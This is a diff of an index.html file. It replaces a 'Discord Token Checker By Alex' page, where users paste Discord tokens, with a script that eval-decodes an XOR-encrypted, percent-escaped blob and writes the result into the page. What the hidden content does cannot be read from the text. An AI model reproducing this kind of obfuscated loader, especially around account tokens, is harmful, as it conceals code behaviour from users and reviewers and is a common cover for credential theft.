--- a/index.html
+++ b/index.html
@@ -1,44 +1,15 @@
-<!DOCTYPE HTML>
 <html>
-  <head>
-    <title>Discord Token Checker By Alex</title>
-  </head>
-  <style>
+<head>
+</head>
+<body>
 
-    body {
-      background: url("https://w.wallhaven.cc/full/6q/wallhaven-6qx916.png");
-      font-family: Arial, Helvetica, sans-serif;
-      color: white;
-    }
-
-    p {
-      font-family: Arial, Helvetica, sans-serif;
-      color: white;
-    }
-
-    textarea,
-    button {
-      background-color: #000000;
-      color: white;
-      font-family: Arial, Helvetica, sans-serif;
-      cursor: pointer;
-    }
-  </style>
-  <script src="Alex.js" defer>
-  </script>
-  <body>
-    <center>
-      <h1>Discord Token Checker By Alex</h1>
-      <p>Enter tokens</p>
-      <textarea id="tokens" placeholder="Enter tokens here" style="margin: 0px; width: 246px; height: 196px;"></textarea>
-      <br/><br/>
-      <button id="check">Check</button>
-      <br/><br/>
-      <textarea placeholder="result :" id="valid" rows="10" cols="80"></textarea>
-    </center>
-  </body>
-
-
+<script type="text/javascript">
+<!-- 
+eval(unescape('%66%75%6e%63%74%69%6f%6e%20%67%39%65%64%61%33%30%38%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%36%34%30%31%34%39%38%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%36%33%39%35%35%31%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%2d%36%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
+eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%67%39%65%64%61%33%30%38%28%27') + '%44%20%43%5d%4d%5e%56%50%48%2f%4b%5f%52%54%43%1a%18%46%6a%73%75%71%4d%16%15%27%20%45%67%63%63%6e%4d%15%13%2f%23%23%27%44%7d%66%72%76%6f%4d%4c%6c%70%6c%70%79%6c%21%53%7d%75%6f%7d%20%4a%67%6e%6c%70%6d%7f%2f%40%7b%22%4e%74%68%77%47%30%7b%69%7d%7b%63%40%17%19%20%25%4b%30%6b%6a%61%6d%4d%1b%14%22%2f%44%7a%73%7a%77%6a%42%14%19%1b%14%22%2f%20%25%61%70%6f%7e%20%86%1a%18%22%22%2f%20%25%2f%6d%62%68%77%6a%71%7d%7f%70%63%46%25%72%7d%77%2f%2e%69%73%72%72%7d%49%33%36%74%31%78%66%74%75%67%6f%78%6f%7d%32%6a%60%30%69%7a%74%75%3c%34%73%31%74%61%71%7b%6b%62%7d%6d%73%3a%34%73%7a%36%31%3f%3d%73%71%6c%2e%28%48%1b%14%22%2f%20%25%2f%23%69%74%72%7d%3a%64%63%77%66%74%7c%49%23%42%79%69%60%7b%3a%22%4a%62%74%7f%62%7f%6a%68%61%35%2f%71%63%70%70%35%7a%62%7d%6a%6d%47%14%19%2e%22%22%2f%20%25%60%70%77%74%7e%47%2f%75%6a%6b%73%6d%42%1a%15%23%27%20%21%8a%1b%14%17%19%20%25%2f%23%73%27%87%14%19%2e%22%22%2f%20%25%65%70%71%7b%35%6b%6e%7b%6b%76%76%46%25%4e%7d%6a%66%74%35%2f%46%6f%76%75%6d%79%66%6c%62%33%20%7e%6e%7c%7d%37%70%6d%7b%66%69%44%12%16%21%2f%2e%22%22%2f%6f%76%7b%70%7d%41%20%7a%67%67%7e%6f%48%15%13%2f%23%23%27%85%14%19%1b%14%22%2f%20%25%73%6e%7b%7b%61%7f%62%6f%36%17%19%20%25%2f%23%6d%7a%7c%7d%7c%7c%22%85%1a%16%25%2f%23%23%27%20%6f%6e%61%75%69%71%73%78%7d%6f%36%68%73%75%7c%70%44%22%20%30%35%3f%33%33%37%47%14%19%2e%22%22%2f%20%25%60%70%77%74%7e%47%2f%75%6a%6b%73%6d%42%1a%15%23%27%20%21%2f%2e%68%71%7d%7c%30%65%62%76%6e%74%78%49%2e%43%7c%66%61%71%3b%23%4b%6a%74%7b%62%72%6b%6d%6e%34%25%70%62%71%78%35%7e%62%70%6b%68%48%15%13%2f%23%23%27%20%21%60%73%7c%7d%7c%7e%43%2f%73%70%6e%72%7d%62%70%45%17%19%20%25%2f%23%86%12%16%21%2f%4a%31%7d%73%79%71%62%41%16%11%20%21%4b%71%6d%7c%66%70%79%2f%7c%7d%68%45%2f%4e%7a%6f%7a%3d%76%7a%21%23%6f%6a%6a%6c%71%4c%17%14%2f%20%41%3c%7c%6c%79%69%71%73%4c%17%14%2f%20%41%61%70%6f%7e%42%14%19%2e%22%22%2f%44%6a%62%71%7f%6a%7e%43%1a%18%22%22%2f%20%25%2f%47%6b%36%42%4d%66%71%6d%71%71%6c%25%53%70%74%6a%72%21%40%66%6f%6d%78%6d%7b%2f%4d%7a%27%41%75%62%76%46%31%67%31%47%1a%15%23%27%20%21%2f%2e%46%72%4d%4d%77%73%6e%7d%27%7c%72%78%63%70%7d%4b%33%75%4d%16%15%27%20%21%2f%2e%22%46%73%6d%7d%73%62%7d%6a%61%21%66%62%47%2c%73%73%72%62%71%7c%29%20%71%7b%6f%6d%6f%67%73%71%63%6e%7d%42%2e%4c%7d%72%6f%7c%2f%7c%76%78%6e%71%78%20%69%62%70%6f%2c%2f%7f%79%76%77%6e%42%2e%74%6e%70%69%6b%7d%46%25%3f%73%7b%40%20%7a%66%62%7e%6a%49%20%3b%33%39%73%7f%47%21%67%63%6b%69%67%7c%43%2f%32%3a%3d%70%79%48%20%40%46%3c%7c%68%77%7f%62%79%6d%60%4d%1b%14%22%2f%20%25%2f%23%47%69%7e%32%4d%4a%6c%7c%3c%42%10%19%23%23%27%20%21%2f%4a%6c%7f%73%7c%76%7d%23%6a%6b%45%2f%60%66%6f%6d%78%2e%47%40%6b%6e%68%77%45%3c%60%7f%7e%73%73%77%4d%16%15%27%20%21%2f%2e%22%46%61%7e%36%4d%47%6d%79%33%43%1a%18%22%22%2f%20%25%2f%47%7f%6a%78%7d%6e%70%6f%63%2f%70%71%6e%6c%6e%6f%73%75%63%63%7c%47%21%7e%68%70%7e%77%7b%20%47%21%2e%6b%6e%4a%2e%7f%6e%77%6a%6b%2e%21%71%7d%79%7d%4a%2e%34%3f%2d%23%68%73%75%70%4b%2c%3a%3f%2e%47%4b%30%7f%6a%78%7d%6e%70%6f%63%4d%15%13%2f%23%23%27%44%32%60%63%70%7e%62%7e%47%1a%15%23%27%44%32%61%7d%6e%7b%4d%15%13%1a%15%16%11%15%17%4b%3d%6a%7e%7a%74%4716401498%36%37%39%38%34%34%39' + unescape('%27%29%29%3b'));
+// -->
+</script>
+<noscript><i>Javascript required</i></noscript>
 
 </html>
 
